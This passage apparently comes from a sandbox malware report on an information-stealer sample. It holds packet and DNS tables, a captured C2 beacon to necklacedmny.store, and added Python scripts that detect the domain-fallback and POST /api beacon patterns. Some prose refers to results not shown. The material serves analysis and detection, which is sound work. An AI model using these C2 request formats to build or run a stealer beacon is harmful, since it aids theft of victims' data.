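On the constructed data this returns one finding for 192.168.2.5 with all five names in the burst and eight sessions to necklacedmny.store, and nothing for 192.168.2.7. Fed from real EVE logs, the dns records would be the A-query events and the tls records the handshake events with their sni field; in practice the burst condition is narrowed further (exclude an allowlist, require a young or cheap TLD, or require that only one of the names got an answer) to keep browser prefetching and CDN fan-out out of the alerts.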
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 30, 2024 02:26:59.657471895 CET | 49704 | 443 | 192.168.2.5 | 188.114.97.3
Oct 30, 2024 02:26:59.657572985 CET | 443 | 49704 | 188.114.97.3 | 192.168.2.5
Oct 30, 2024 02:26:59.657679081 CET | 49704 | 443 | 192.168.2.5 | 188.114.97.3
Oct 30, 2024 02:26:59.659302950 CET | 49704 | 443 | 192.168.2.5 | 188.114.97.3
Oct 30, 2024 02:26:59.659357071 CET | 443 | 49704 | 188.114.97.3 | 192.168.2.5
Oct 30, 2024 02:27:00.285841942 CET | 443 | 49704 | 188.114.97.3 | 192.168.2.5
Oct 30, 2024 02:27:00.285954952 CET | 49704 | 443 | 192.168.2.5 | 188.114.97.3
Oct 30, 2024 02:27:00.290357113 CET | 49704 | 443 | 192.168.2.5 | 188.114.97.3
Oct 30, 2024 02:27:00.290369034 CET | 443 | 49704 | 188.114.97.3 | 192.168.2.5
Oct 30, 2024 02:27:00.290702105 CET | 443 | 49704 | 188.114.97.3 | 192.168.2.5
Oct 30, 2024 02:27:00.342691898 CET | 49704 | 443 | 192.168.2.5 | 188.114.97.3
Oct 30, 2024 02:27:00.350749969 CET | 49704 | 443 | 192.168.2.5 | 188.114.97.3
Oct 30, 2024 02:27:00.350788116 CET | 49704 | 443 | 192.168.2.5 | 188.114.97.3
Oct 30, 2024 02:27:00.350991964 CET | 443 | 49704 | 188.114.97.3 | 192.168.2.5
Oct 30, 2024 02:27:00.796551943 CET | 443 | 49704 | 188.114.97.3 | 192.168.2.5
Oct 30, 2024 02:27:00.796664953 CET | 443 | 49704 | 188.114.97.3 | 192.168.2.5
Oct 30, 2024 02:27:00.796731949 CET | 49704 | 443 | 192.168.2.5 | 188.114.97.3
Oct 30, 2024 02:27:00.798331976 CET | 49704 | 443 | 192.168.2.5 | 188.114.97.3
Oct 30, 2024 02:27:00.798352003 CET | 443 | 49704 | 188.114.97.3 | 192.168.2.5
Oct 30, 2024 02:27:00.798383951 CET | 49704 | 443 | 192.168.2.5 | 188.114.97.3
Oct 30, 2024 02:27:00.798389912 CET | 443 | 49704 | 188.114.97.3 | 192.168.2.5
Oct 30, 2024 02:27:00.885833025 CET | 49705 | 443 | 192.168.2.5 | 188.114.97.3
Oct 30, 2024 02:27:00.885921001 CET | 443 | 49705 | 188.114.97.3 | 192.168.2.5
Oct 30, 2024 02:27:00.886044025 CET | 49705 | 443 | 192.168.2.5 | 188.114.97.3
Oct 30, 2024 02:27:00.897501945 CET | 49705 | 443 | 192.168.2.5 | 188.114.97.3
Oct 30, 2024 02:27:00.897538900 CET | 443 | 49705 | 188.114.97.3 | 192.168.2.5
Oct 30, 2024 02:27:01.506799936 CET | 443 | 49705 | 188.114.97.3 | 192.168.2.5
Oct 30, 2024 02:27:01.506961107 CET | 49705 | 443 | 192.168.2.5 | 188.114.97.3
Oct 30, 2024 02:27:01.508934975 CET | 49705 | 443 | 192.168.2.5 | 188.114.97.3
Oct 30, 2024 02:27:01.508965015 CET | 443 | 49705 | 188.114.97.3 | 192.168.2.5
Oct 30, 2024 02:27:01.509217978 CET | 443 | 49705 | 188.114.97.3 | 192.168.2.5
Oct 30, 2024 02:27:01.510946035 CET | 49705 | 443 | 192.168.2.5 | 188.114.97.3
Oct 30, 2024 02:27:01.510991096 CET | 49705 | 443 | 192.168.2.5 | 188.114.97.3
Oct 30, 2024 02:27:01.511070013 CET | 443 | 49705 | 188.114.97.3 | 192.168.2.5
Oct 30, 2024 02:27:01.974016905 CET | 443 | 49705 | 188.114.97.3 | 192.168.2.5
Oct 30, 2024 02:27:01.974065065 CET | 443 | 49705 | 188.114.97.3 | 192.168.2.5
Oct 30, 2024 02:27:01.974098921 CET | 443 | 49705 | 188.114.97.3 | 192.168.2.5
Oct 30, 2024 02:27:01.974128962 CET | 443 | 49705 | 188.114.97.3 | 192.168.2.5
Oct 30, 2024 02:27:01.974137068 CET | 49705 | 443 | 192.168.2.5 | 188.114.97.3
Oct 30, 2024 02:27:01.974170923 CET | 443 | 49705 | 188.114.97.3 | 192.168.2.5
Oct 30, 2024 02:27:01.974206924 CET | 49705 | 443 | 192.168.2.5 | 188.114.97.3
Oct 30, 2024 02:27:01.974224091 CET | 443 | 49705 | 188.114.97.3 | 192.168.2.5
Oct 30, 2024 02:27:01.974256992 CET | 443 | 49705 | 188.114.97.3 | 192.168.2.5
Oct 30, 2024 02:27:01.974280119 CET | 49705 | 443 | 192.168.2.5 | 188.114.97.3
Oct 30, 2024 02:27:01.974301100 CET | 443 | 49705 | 188.114.97.3 | 192.168.2.5
Oct 30, 2024 02:27:01.974395990 CET | 49705 | 443 | 192.168.2.5 | 188.114.97.3
Oct 30, 2024 02:27:01.974400997 CET | 443 | 49705 | 188.114.97.3 | 192.168.2.5
Oct 30, 2024 02:27:01.974412918 CET | 443 | 49705 | 188.114.97.3 | 192.168.2.5
Oct 30, 2024 02:27:01.974478006 CET | 49705 | 443 | 192.168.2.5 | 188.114.97.3
Oct 30, 2024 02:27:02.090749979 CET | 443 | 49705 | 188.114.97.3 | 192.168.2.5
Oct 30, 2024 02:27:02.090831995 CET | 443 | 49705 | 188.114.97.3 | 192.168.2.5
Oct 30, 2024 02:27:02.090886116 CET | 443 | 49705 | 188.114.97.3 | 192.168.2.5
Oct 30, 2024 02:27:02.090899944 CET | 49705 | 443 | 192.168.2.5 | 188.114.97.3
Oct 30, 2024 02:27:02.090925932 CET | 443 | 49705 | 188.114.97.3 | 192.168.2.5
Oct 30, 2024 02:27:02.090981960 CET | 49705 | 443 | 192.168.2.5 | 188.114.97.3
Oct 30, 2024 02:27:02.090987921 CET | 443 | 49705 | 188.114.97.3 | 192.168.2.5
                                                  Oct 30, 2024 02:27:02.091001034 CET44349705188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:02.091070890 CET49705443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:02.091088057 CET44349705188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:02.091109037 CET44349705188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:02.091176033 CET49705443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:02.107687950 CET49705443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:02.107726097 CET44349705188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:02.107800007 CET49705443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:02.107815981 CET44349705188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:02.300184965 CET49706443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:02.300241947 CET44349706188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:02.300367117 CET49706443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:02.300796986 CET49706443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:02.300817013 CET44349706188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:02.910072088 CET44349706188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:02.910209894 CET49706443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:02.912084103 CET49706443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:02.912115097 CET44349706188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:02.912411928 CET44349706188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:02.913804054 CET49706443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:02.914026022 CET49706443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:02.914083958 CET44349706188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:03.458579063 CET44349706188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:03.458709002 CET44349706188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:03.458817005 CET49706443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:03.459115028 CET49706443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:03.459158897 CET44349706188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:03.586864948 CET49707443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:03.586937904 CET44349707188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:03.587115049 CET49707443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:03.587433100 CET49707443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:03.587486029 CET44349707188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:04.229799986 CET44349707188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:04.230056047 CET49707443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:04.231663942 CET49707443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:04.231689930 CET44349707188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:04.232036114 CET44349707188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:04.233659029 CET49707443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:04.233844995 CET49707443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:04.233894110 CET44349707188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:04.233962059 CET49707443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:04.233974934 CET44349707188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:04.988037109 CET44349707188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:04.988161087 CET44349707188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:04.988240957 CET49707443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:04.988358021 CET49707443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:04.988405943 CET44349707188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:05.210288048 CET49708443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:05.210313082 CET44349708188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:05.210417986 CET49708443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:05.210844994 CET49708443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:05.210858107 CET44349708188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:05.844047070 CET44349708188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:05.844141006 CET49708443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:05.846240044 CET49708443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:05.846245050 CET44349708188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:05.846607924 CET44349708188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:05.848242998 CET49708443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:05.848479033 CET49708443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:05.848510981 CET44349708188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:05.848594904 CET49708443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:05.848603964 CET44349708188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:06.575942039 CET44349708188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:06.576203108 CET44349708188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:06.576308012 CET49708443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:06.576308966 CET49708443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:06.873975992 CET49708443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:06.873987913 CET44349708188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:06.945806980 CET49709443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:06.945837021 CET44349709188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:06.945919991 CET49709443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:06.946346045 CET49709443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:06.946356058 CET44349709188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:07.573899031 CET44349709188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:07.574027061 CET49709443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:07.575645924 CET49709443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:07.575653076 CET44349709188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:07.575851917 CET44349709188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:07.577249050 CET49709443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:07.577356100 CET49709443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:07.577359915 CET44349709188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:08.044147015 CET44349709188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:08.044377089 CET44349709188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:08.044594049 CET49709443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:08.044816017 CET49709443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:08.044826984 CET44349709188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:08.598853111 CET49710443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:08.598880053 CET44349710188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:08.599052906 CET49710443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:08.599371910 CET49710443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:08.599383116 CET44349710188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:09.216331005 CET44349710188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:09.216408968 CET49710443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:09.218477964 CET49710443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:09.218487978 CET44349710188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:09.218686104 CET44349710188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:09.220293999 CET49710443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:09.221298933 CET49710443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:09.221332073 CET44349710188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:09.221431971 CET49710443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:09.221462011 CET44349710188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:09.221579075 CET49710443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:09.221610069 CET44349710188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:09.222156048 CET49710443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:09.222179890 CET44349710188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:09.222335100 CET49710443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:09.222364902 CET44349710188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:09.222521067 CET49710443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:09.222548962 CET44349710188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:09.222579956 CET49710443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:09.222594023 CET44349710188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:09.222718000 CET49710443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:09.222740889 CET44349710188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:09.222773075 CET49710443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:09.222909927 CET49710443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:09.222942114 CET49710443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:09.232342005 CET44349710188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:09.232518911 CET49710443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:09.232543945 CET44349710188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:09.232554913 CET49710443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:09.232575893 CET44349710188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:09.232633114 CET49710443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:09.236560106 CET44349710188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:11.164943933 CET44349710188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:11.165194035 CET44349710188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:11.165296078 CET49710443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:11.165561914 CET49710443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:11.165576935 CET44349710188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:11.206334114 CET49711443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:11.206360102 CET44349711188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:11.206446886 CET49711443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:11.206770897 CET49711443192.168.2.5188.114.97.3
                                                  Oct 30, 2024 02:27:11.206780910 CET44349711188.114.97.3192.168.2.5
                                                  Oct 30, 2024 02:27:11.546109915 CET49711443192.168.2.5188.114.97.3
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 30, 2024 02:26:59.580284119 CET | 54712 | 53 | 192.168.2.5 | 1.1.1.1
Oct 30, 2024 02:26:59.590156078 CET | 53 | 54712 | 1.1.1.1 | 192.168.2.5
Oct 30, 2024 02:26:59.599684000 CET | 51374 | 53 | 192.168.2.5 | 1.1.1.1
Oct 30, 2024 02:26:59.608649015 CET | 53 | 51374 | 1.1.1.1 | 192.168.2.5
Oct 30, 2024 02:26:59.610111952 CET | 63190 | 53 | 192.168.2.5 | 1.1.1.1
Oct 30, 2024 02:26:59.619949102 CET | 53 | 63190 | 1.1.1.1 | 192.168.2.5
Oct 30, 2024 02:26:59.622782946 CET | 63763 | 53 | 192.168.2.5 | 1.1.1.1
Oct 30, 2024 02:26:59.631856918 CET | 53 | 63763 | 1.1.1.1 | 192.168.2.5
Oct 30, 2024 02:26:59.635027885 CET | 54886 | 53 | 192.168.2.5 | 1.1.1.1
Oct 30, 2024 02:26:59.650221109 CET | 53 | 54886 | 1.1.1.1 | 192.168.2.5

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Oct 30, 2024 02:26:59.580284119 CET | 192.168.2.5 | 1.1.1.1 | 0xa4cf | Standard query (0) | presticitpo.store | A (IP address) | IN (0x0001) | false
Oct 30, 2024 02:26:59.599684000 CET | 192.168.2.5 | 1.1.1.1 | 0xc6dd | Standard query (0) | crisiwarny.store | A (IP address) | IN (0x0001) | false
Oct 30, 2024 02:26:59.610111952 CET | 192.168.2.5 | 1.1.1.1 | 0x1320 | Standard query (0) | fadehairucw.store | A (IP address) | IN (0x0001) | false
Oct 30, 2024 02:26:59.622782946 CET | 192.168.2.5 | 1.1.1.1 | 0x4c1e | Standard query (0) | thumbystriw.store | A (IP address) | IN (0x0001) | false
Oct 30, 2024 02:26:59.635027885 CET | 192.168.2.5 | 1.1.1.1 | 0x850c | Standard query (0) | necklacedmny.store | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Oct 30, 2024 02:26:59.590156078 CET | 1.1.1.1 | 192.168.2.5 | 0xa4cf | Name error (3) | presticitpo.store | none | none | A (IP address) | IN (0x0001) | false
Oct 30, 2024 02:26:59.608649015 CET | 1.1.1.1 | 192.168.2.5 | 0xc6dd | Name error (3) | crisiwarny.store | none | none | A (IP address) | IN (0x0001) | false
Oct 30, 2024 02:26:59.619949102 CET | 1.1.1.1 | 192.168.2.5 | 0x1320 | Name error (3) | fadehairucw.store | none | none | A (IP address) | IN (0x0001) | false
Oct 30, 2024 02:26:59.631856918 CET | 1.1.1.1 | 192.168.2.5 | 0x4c1e | Name error (3) | thumbystriw.store | none | none | A (IP address) | IN (0x0001) | false
Oct 30, 2024 02:26:59.650221109 CET | 1.1.1.1 | 192.168.2.5 | 0x850c | No error (0) | necklacedmny.store |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Oct 30, 2024 02:26:59.650221109 CET | 1.1.1.1 | 192.168.2.5 | 0x850c | No error (0) | necklacedmny.store |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
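The DNS tables above show the sample resolving five .store names within about 70 ms of each other: four come back NXDOMAIN and only necklacedmny.store resolves (to 188.114.97.3 and 188.114.96.3, which the Cloudflare headers in the HTTPS sessions below confirm is proxied), and that is the host the process then talks to on 443. This is consistent with a hard-coded C2 list being walked until one entry answers, and the shape "burst of NXDOMAIN answers under one TLD, then one success" is worth a hunt query of its own. The Python below is an added example and not part of the Joe Sandbox report: it runs that check over records constructed from the report's DNS answer table (timestamps shortened to microseconds so datetime can parse them). The 5-second window and the threshold of three failures are assumed tuning values.

```python
"""Hunt for the 'walk a C2 domain list until one resolves' pattern in the DNS
tables above. Added example, not part of the Joe Sandbox report. Records are
constructed from the report's DNS answer table (timestamps cut to microseconds
so datetime can parse them)."""
from collections import defaultdict
from datetime import datetime, timedelta

NXDOMAIN, NOERROR = 3, 0  # DNS reply codes ("Name error" / "No error")

# Constructed from the report: (answer timestamp, transaction id, name, rcode)
DNS_LOG = [
    ("2024-10-30 02:26:59.590156", 0xa4cf, "presticitpo.store", NXDOMAIN),
    ("2024-10-30 02:26:59.608649", 0xc6dd, "crisiwarny.store", NXDOMAIN),
    ("2024-10-30 02:26:59.619949", 0x1320, "fadehairucw.store", NXDOMAIN),
    ("2024-10-30 02:26:59.631856", 0x4c1e, "thumbystriw.store", NXDOMAIN),
    ("2024-10-30 02:26:59.650221", 0x850c, "necklacedmny.store", NOERROR),
]


def registrable_domain(name):
    """Last two labels; assumes single-label TLDs like .store (not .co.uk)."""
    return ".".join(name.lower().rstrip(".").split(".")[-2:])


def find_fallback_bursts(log, window=timedelta(seconds=5), min_failures=3):
    """Group answers into consecutive time windows and report every TLD in a
    window with >= min_failures distinct NXDOMAIN names plus at least one
    name that resolved.

    Returns a list of (tld, sorted failed names, sorted resolved names).
    Window and threshold are assumed tuning values, not from the report."""
    records = sorted(
        (datetime.strptime(ts, "%Y-%m-%d %H:%M:%S.%f"), name, rcode)
        for ts, _tid, name, rcode in log)
    findings, i = [], 0
    while i < len(records):
        start = records[i][0]
        # records are sorted, so everything inside the window is contiguous
        burst = [r for r in records[i:] if r[0] - start <= window]
        per_tld = defaultdict(lambda: (set(), set()))
        for _, name, rcode in burst:
            dom = registrable_domain(name)
            failed, resolved = per_tld[dom.rsplit(".", 1)[-1]]
            (failed if rcode == NXDOMAIN else resolved).add(dom)
        for tld, (failed, resolved) in sorted(per_tld.items()):
            if len(failed) >= min_failures and resolved:
                findings.append((tld, sorted(failed), sorted(resolved)))
        i += len(burst)
    return findings


if __name__ == "__main__":
    for tld, failed, resolved in find_fallback_bursts(DNS_LOG):
        print(f".{tld}: {len(failed)} NXDOMAIN answers, then resolved {resolved}")
```

In a SIEM the same logic keys on the client process as well, since the report attributes all five lookups and the follow-on TCP connections to PID 5800 (file.exe); a browser producing NXDOMAINs from typos does not then immediately open a TLS session to the one name that worked.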
                                                  • necklacedmny.store
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 188.114.97.3 | 443 | 5800 | C:\Users\user\Desktop\file.exe

Timestamp | Bytes transferred | Direction | Data
2024-10-30 01:27:00 UTC | 265 | OUT | POST /api HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Content-Length: 8
Host: necklacedmny.store
2024-10-30 01:27:00 UTC | 8 | OUT | Data Raw: 61 63 74 3d 6c 69 66 65
Data Ascii: act=life
2024-10-30 01:27:00 UTC | 1019 | IN | HTTP/1.1 200 OK
Date: Wed, 30 Oct 2024 01:27:00 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: PHPSESSID=9llsouon0c736259orr6ecbb17; expires=Sat, 22 Feb 2025 19:13:39 GMT; Max-Age=9999999; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
cf-cache-status: DYNAMIC
vary: accept-encoding
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G063m0bUYH%2BIdHQAU9aHmiy5WDlecuQwe8P%2FnZ15gnLFBAqEcQoLEt%2FMvAUqA5rQDb4%2BLPsvxg69iRiwniOZWayFHeFRDn%2Fmfw%2FPoyuQAVXtZze5xlaHPgx8yuPwjYpkmrNragk%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8da79ed36c864772-DFW
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=1930&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2845&recv_bytes=909&delivery_rate=1472292&cwnd=239&unsent_bytes=0&cid=143ad0a75518f4aa&ts=530&x=0"
2024-10-30 01:27:00 UTC | 7 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a
Data Ascii: 2ok
2024-10-30 01:27:00 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0
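
Both HTTPS sessions to necklacedmny.store are form-encoded POSTs to /api whose body is an act= verb: the first sends act=life and gets back a chunked body that decodes to the two bytes "ok", the second sends act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j= and receives a large chunked blob (first chunk 0x1d96 bytes). The ver= and lid= pair is what public LummaC analyses describe as the stealer version and build identifier; this page itself does not label the fields. The Python below is an added example, not code from the report or the sandbox vendor: it decodes the captured "Data Raw" hex, reassembles the chunked reply, parses the requests and returns which indicators matched, so it can be dropped into a proxy-log or PCAP triage script. The act vocabulary is limited to the two verbs seen on this page, and the request to example.invalid is a constructed control case.

```python
"""Triage check for the LummaC-style C2 exchange in the HTTPS session tables.
Added example, not code from the Joe Sandbox report or the sandbox vendor.
Sample requests are constructed from the captured bodies; example.invalid is
a made-up control host."""
from urllib.parse import parse_qs

# "Data Raw" hex dumps copied from the report (request body; chunked reply).
LIFE_BODY_HEX = "61 63 74 3d 6c 69 66 65"
LIFE_REPLY_HEX = "32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a"

CHROME_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36")


def build_request(host, body, ua=CHROME_UA):
    """Constructed: rebuild a captured POST /api request with CRLF framing."""
    return ("POST /api HTTP/1.1\r\nConnection: Keep-Alive\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n"
            f"User-Agent: {ua}\r\nContent-Length: {len(body)}\r\n"
            f"Host: {host}\r\n\r\n{body}")


REQ_LIFE = build_request("necklacedmny.store", "act=life")
REQ_RECV = build_request("necklacedmny.store",
                         "act=recive_message&ver=4.0&lid=4SD0y4--legendaryy&j=")
REQ_CONTROL = build_request("example.invalid", "user=alice&action=list")

# Only the verbs actually observed on this page.
LUMMA_ACTS = {"life", "recive_message"}


def hex_dump_to_bytes(dump):
    """Turn a space-separated 'Data Raw' dump back into bytes."""
    return bytes.fromhex(dump.replace(" ", ""))


def decode_chunked(data):
    """Reassemble an HTTP/1.1 chunked body (hex sizes, CRLF framed)."""
    out, pos = bytearray(), 0
    while True:
        end = data.index(b"\r\n", pos)
        size = int(data[pos:end].split(b";")[0], 16)  # ignore chunk extensions
        pos = end + 2
        if size == 0:
            return bytes(out)
        out += data[pos:pos + size]
        pos += size + 2  # skip the chunk's trailing CRLF


def parse_http_request(raw):
    """Split a raw request into method, path, lower-cased headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers, "body": body}


def lumma_beacon_indicators(req):
    """Return the indicators matched; an empty list means no match.

    Shape of the observed traffic: form-encoded POST to /api, an act= verb,
    and for the second request a ver=/lid= pair plus an empty j= parameter."""
    hits = []
    if req["method"] != "POST" or req["path"] != "/api":
        return hits
    ctype = req["headers"].get("content-type", "")
    if not ctype.startswith("application/x-www-form-urlencoded"):
        return hits
    form = parse_qs(req["body"], keep_blank_values=True)
    act = form.get("act", [""])[0]
    if act in LUMMA_ACTS:
        hits.append(f"act={act}")
    if "ver" in form and "lid" in form:
        hits.append(f"ver={form['ver'][0]} lid={form['lid'][0]}")
    if form.get("j") == [""]:
        hits.append("empty j=")
    return hits


if __name__ == "__main__":
    for raw in (REQ_LIFE, REQ_RECV, REQ_CONTROL):
        req = parse_http_request(raw)
        print(req["headers"]["host"], lumma_beacon_indicators(req))
    print(decode_chunked(hex_dump_to_bytes(LIFE_REPLY_HEX)))
```

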